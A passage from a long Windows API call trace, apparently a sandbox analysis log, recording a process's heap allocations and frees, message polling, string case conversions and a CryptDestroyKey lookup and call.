out: hHeap=0x2af0000) returned 1 [0152.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa678 [0152.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0152.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0152.597] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0152.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0152.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0152.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0152.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72648 [0152.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0152.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0152.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0152.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0152.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa5a0 [0152.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0152.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0152.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0152.597] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa690 | out: hHeap=0x2af0000) returned 1 [0152.597] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0152.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa690 [0152.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0152.598] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0152.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0152.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0152.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0152.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0152.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0152.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0152.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0152.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0152.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0152.598] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0152.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0152.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0152.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0152.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa738 | out: hHeap=0x2af0000) returned 1 [0152.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0152.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0152.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0152.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0152.598] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0152.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0152.598] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0152.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0152.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0152.598] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0152.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0152.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0152.598] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0152.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0152.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0152.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0152.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0152.599] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0152.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0152.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa738 [0152.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0152.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0152.599] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0152.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0152.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0152.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0152.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78138 [0152.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0152.599] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0152.599] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78138 | out: hHeap=0x2af0000) returned 1 [0152.599] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0152.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaa68 [0152.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0152.599] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0152.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0152.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0152.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0152.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0152.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0152.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0152.599] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0152.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0152.599] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0152.600] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0152.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77fd0 | out: hHeap=0x2af0000) returned 1 [0152.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0152.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0152.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa870 | out: hHeap=0x2af0000) returned 1 [0152.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0152.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0152.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0152.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed80 [0152.600] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0152.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0152.600] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0152.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0152.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0152.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0152.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0152.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0152.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0152.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0152.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0152.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0152.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0152.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0152.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0152.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0152.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa68 | out: hHeap=0x2af0000) returned 1 [0152.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0152.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0152.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0152.600] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0152.600] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0152.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0152.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0152.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0152.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0152.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0152.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0152.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0152.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0152.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0152.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0152.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0152.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0152.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0152.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0152.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0152.601] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0152.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0152.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0152.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0152.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0152.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0152.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72778 | out: hHeap=0x2af0000) returned 1 [0152.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0152.601] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0152.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0152.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0152.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0152.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0152.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0152.601] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0152.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0152.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0152.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0152.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0152.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0152.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0152.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0152.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0152.602] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaa8d0, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0152.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0152.602] GetProcAddress (hModule=0x76390000, lpProcName="CryptDestroyKey") returned 0x763afa60 [0152.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0152.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b08 | out: hHeap=0x2af0000) returned 1 [0152.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0152.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0152.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a08 | out: hHeap=0x2af0000) returned 1 [0152.602] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0152.602] CryptDestroyKey (hKey=0x9e20f8) returned 1 [0152.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7478 [0152.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a08 [0152.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0152.602] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8b8 [0152.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0152.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9c0 [0152.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0152.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9c0 | out: hHeap=0x2af0000) returned 1 [0152.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0152.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0152.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0152.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0152.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0152.603] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b18 [0152.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0152.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b18 | out: hHeap=0x2af0000) returned 1 [0152.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0152.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a728f8 | out: hHeap=0x2af0000) returned 1 [0152.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa08 | out: hHeap=0x2af0000) returned 1 [0152.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9f0 | out: hHeap=0x2af0000) returned 1 [0152.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0152.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0152.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0152.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0152.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0152.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa38 | out: hHeap=0x2af0000) returned 1 [0152.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0152.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0152.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0152.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783e0 | out: hHeap=0x2af0000) returned 1 [0152.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0152.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0152.603] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0152.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0152.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x29f7698 [0152.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78228 | out: hHeap=0x2af0000) returned 1 [0152.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0152.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7478 | out: hHeap=0x2af0000) returned 1 [0152.604] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0152.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0152.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0152.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0152.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0152.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0152.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0152.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0152.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782f0 [0152.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0152.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0152.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0152.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0152.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0152.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab10 [0152.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0152.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0152.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0152.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0152.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0152.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab10 | out: hHeap=0x2af0000) returned 1 [0152.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0152.604] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0152.604] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0152.604] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0152.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0152.605] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0152.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78318 | out: hHeap=0x2af0000) returned 1 [0152.605] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0152.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaa80 [0152.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0152.605] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0152.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0152.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0152.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0152.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0152.605] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 